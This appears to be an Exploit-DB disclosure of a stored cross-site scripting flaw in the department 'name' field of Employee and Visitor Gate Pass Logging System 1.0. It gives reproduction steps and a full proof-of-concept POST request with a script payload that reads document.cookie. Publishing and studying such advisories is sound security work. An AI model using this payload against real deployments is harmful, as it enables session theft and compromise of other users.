Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS)

EDB-ID:

50507

CVE:

N/A




Platform:

PHP

Date:

2021-11-10


# Exploit Title: Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS)
# Date: 10.11.2021
# Exploit Author: İlhami Selamet
# Vendor Homepage: https://www.sourcecodester.com/php/15026/employee-and-visitor-gate-pass-logging-system-php-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=15026&title=Employee+and+Visitor+Gate+Pass+Logging+System+in+PHP+with+Source+Code
# Version: v1.0
# Tested on: Kali Linux + XAMPP v8.0.12

Employee and Visitor Gate Pass Logging System PHP 1.0 suffers from a Cross Site Scripting (XSS) vulnerability.

Step 1 - Login with admin account & navigate to  'Department List' tab. - http://localhost/employee_gatepass/admin/?page=maintenance/department
Step 1 - Click on the 'Create New' button for adding a new department.
Step 2 - Fill out all required fields to create a new department. Input a payload in the department 'name' field - <script>alert(document.cookie)</script>
Step 3 - Save the department.

The stored XSS triggers for all users that navigate to the 'Department List' page.

PoC

POST /employee_gatepass/classes/Master.php?f=save_department HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------407760789114464123714007564888
Content-Length: 555
Origin: http://localhost
Connection: close
Referer: http://localhost/employee_gatepass/admin/?page=maintenance/department
Cookie: PHPSESSID=8d0l6t3pq47irgnbipjjesrv54

-----------------------------407760789114464123714007564888
Content-Disposition: form-data; name="id"


-----------------------------407760789114464123714007564888
Content-Disposition: form-data; name="name"

<script>alert(document.cookie);</script>
-----------------------------407760789114464123714007564888
Content-Disposition: form-data; name="description"

desc
-----------------------------407760789114464123714007564888
Content-Disposition: form-data; name="status"

1
-----------------------------407760789114464123714007564888--